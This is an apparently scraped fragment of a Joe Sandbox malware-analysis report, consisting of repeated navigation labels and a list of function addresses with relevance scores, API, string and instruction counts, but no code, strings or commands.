|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1950E4 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 69stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB19CF68 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB15B778 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB15CC78 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMONLIBRARYCODE
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB191D10 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 200comCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB15D0A8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB15A09C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1C9E08 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1B5E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88networkCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1B03C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1CB224 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB15DC30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1CA0C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1C9868 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1C9BD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB15FD90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB18DDF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB18DCA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB18DD48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1CFEA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB18DEA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1615B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1614E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1614FC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB161370 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1475C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB145620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|